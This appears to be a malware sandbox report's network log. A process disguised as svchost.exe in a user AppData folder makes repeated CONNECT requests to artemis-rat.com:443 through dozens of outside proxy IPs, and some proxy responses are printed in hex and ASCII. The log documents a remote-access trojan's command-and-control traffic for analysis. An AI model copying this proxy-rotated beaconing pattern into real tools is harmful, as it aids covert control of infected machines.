                                                                                    Mar 9, 2024 13:14:37.488590956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3612192.168.2.561464104.18.234.2188043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.492258072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.646573067 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3613192.168.2.56143235.185.196.38312843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.492444038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.705430031 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3614192.168.2.557977185.236.46.221567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.493139029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3615192.168.2.561438157.185.157.1512658943220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.511221886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3616192.168.2.561386198.199.86.11808043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.512289047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3617192.168.2.561293124.163.236.54730243220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.512604952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.979763985 CET90INHTTP/1.1 200 OK
                                                                                    Content-Type: application/json
                                                                                    Connection: close
                                                                                    Content-Length: 55


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3618192.168.2.56144194.131.63.44312843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.516693115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.740281105 CET1260INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/6.0.0-20220501-re899e0c27
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3670
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    Cache-Status: ezproxies.com
                                                                                    Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-seri


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3619192.168.2.561412194.34.232.1078043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.517394066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.824050903 CET442INHTTP/1.1 403 Forbidden
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                    Content-Length: 281
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3620192.168.2.561362103.17.213.98808043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.517396927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3621192.168.2.56145278.30.128.10808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.522273064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3622192.168.2.56142113.37.59.99312843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.527551889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.824107885 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3623192.168.2.561418211.222.252.187819343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.530092955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3624192.168.2.56139392.205.110.471493643220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.532566071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.333453894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3625192.168.2.56143946.17.63.1661637943220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.536720037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3626192.168.2.56117192.255.88.219108043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.536721945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3627192.168.2.561430123.126.158.508043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.538222075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3628192.168.2.561470149.102.130.1208043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.538348913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3629192.168.2.56145195.164.89.123888843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.538350105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3630192.168.2.560202209.126.104.384005343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.548465967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3631192.168.2.56149046.17.63.166909143220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.576394081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3632192.168.2.55795859.153.158.190312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.586196899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3633192.168.2.561440103.66.177.173225143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.586426020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3634192.168.2.5614758.219.177.1341567343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.594959021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3635192.168.2.560980138.36.150.15108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.617461920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3636192.168.2.56036227.65.114.8108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.618282080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3637192.168.2.56149486.8.163.88915043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.626183033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3638192.168.2.561499128.140.26.128043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.626247883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.934976101 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.25.2
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.2</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3639192.168.2.561502193.239.58.92808143220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.626938105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3640192.168.2.561547104.16.104.128056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.647716045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.802879095 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3641192.168.2.561554104.25.167.888056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.655776024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.810260057 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
